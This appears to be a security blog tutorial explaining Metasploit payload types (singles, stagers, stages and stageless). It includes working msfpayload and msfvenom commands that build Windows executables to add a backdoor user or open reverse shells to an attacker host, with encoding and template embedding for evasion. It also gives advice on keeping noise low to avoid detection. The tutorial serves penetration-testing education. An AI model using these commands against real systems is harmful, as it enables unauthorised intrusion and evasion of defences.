Understanding Metasploit Payloads

Metasploit is one of the core industry standard platforms for performing Penetration Tests / Hacking, or even just playing. In order to use it correctly, we need to have an understanding of how the modules and payloads work. Simply running a command is one thing, but knowing how it all goes together allows for better crafting of payloads and attacks.

So I suppose for those who don’t know what is a payload?

Wikipedia defines a payload as “the cargo of a data transmission. It is the part of the transmitted data which is the fundamental purpose of the transmission, to the exclusion of information sent with it (such as headers or metadata, sometimes referred to as overhead data) solely to facilitate delivery. In computer security, payload refers to the part of malware which performs a malicious action. In the analysis of malicious software such as worms, viruses and Trojans, it refers to the software’s harmful results. Examples of payloads include data destruction, messages with insulting text or spurious e-mail messages sent to a large number of people.

In summary, payload refers to the actual intended message in a transmission.”

Within Metasploit, a payload is an exploit module. Metasploit contains three different types of these, Singles, Stagers and Stages. These three types serve very different roles.

Singles

Singles payloads are completely self-contained and not connected to anything. These type of payloads simply create communications using Metasploit, or they can simply perform some action. They are really just fire-and-forget payloads.

Stagers

Stagers are very small and designed to create some kind of communication, then move to the next stage. The communication set between the attacker and the victim (target) is designed to be very small and reliable. This type of payload allows for great re-use, by separating the communications from the actual attacking stage. They are also responsible for downloading the large payload (Stage), injecting it into memory and then passing execution.

Stages

Stages are payload components that are downloaded by the Stagers. Due to the Stager payload taking care of the communications, the Stages themselves can be quite large and contain various options, more so than a self contained one that contains everything it needs and would fairly large in size.

To break down the payload process a little further let’s use the sample diagram for a single payload:


As you can see the diagram, a regular payload, initiates the connection, the exploit and then the connection back to the attacker. Depending on the type of payload needed that the deployment process can be a little different. Single types are used frequently, and are the least complex to create and use. Stagers and Stages payloads are all about the minimal footprint to create the back connection and then deploying as little as possible to create less noise. Remember “less noise” is a good thing, too much chatter and network communication could be picked up by software or hardware platforms designed to look for it.

If we want to create a Single payload we would could use the following example:

// Create Executable that will create a user account on Target
msfpayload windows/adduser USER=h4ck3r PASS=Password X > Payload.exe

If we want to create a Stager or Stage payload we would could use the following example:

// Create a single Executable Payload for Windows with a reverse connection
msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.1 LPORT=9999 -b “\x00” -e x86/shikata_ga_nai -f exe -o /Payloads/Payload.exe

These payloads are all about reducing the footprint of the initial attack and then staging the delivery of the other components and payloads that need to be delivered to the target machine or device.

The issue with using the traditional approaches is really the size of data that needs to be copied form the attacker to the target. If we break down the size of the components that are being shipped between the devices we end up with a grand total of 1,240KB. Now this may not seem like a lot but it really is, especially if you are not on the local network.

stage0: large buffer of junk plus approximately 350B of shellcode.
stage1: metsrv DLL approximately 755KB
stage2: stdapi DLL approximately 370KB
stage3: priv DLL approximately 115KB

Read: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads

So to add some extra power to these approaches we also have what is called Stageless payloads, which are a new feature that was added in a recent build. An example of a Stageless Payload could be the following, using similar code to the previous example.

// Create a single Executable Payload for Windows with a reverse connection (Stageless)
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.1 LPORT=9999 EXTENSIONS=stdapi,priv -f exe -x ~/scratch/ImmunityDevugger.exe -o /Payloads/Payload.exe

In this example if we were to create a traditional Staged payload we would have used “windows/meterpreter/reverse_tcp“, whereas for the Stageless version we used “windows/meterpreter_reverse_tcp“, notice the path difference.

As you can see Metasploit is a powerful tool that can be used in a variety of ways, using different types of payloads and features that we need for the specific attack we wish to accomplish.

Liam Cleary

I work as an Associate Director for Protiviti in Virginia. My main focus is to ensure that SharePoint can either natively or with minimal customization meet the business requirement securely. I am currently a SharePoint MVP focused on Architecture but also cross the boundary into Development and Security. I am often found at user groups, conferences speaking, offering advice, spending time in the community, teaching my kids how to code, raspberry PI programming, hacking the planet and sometimes building Lego robots.

You may also like...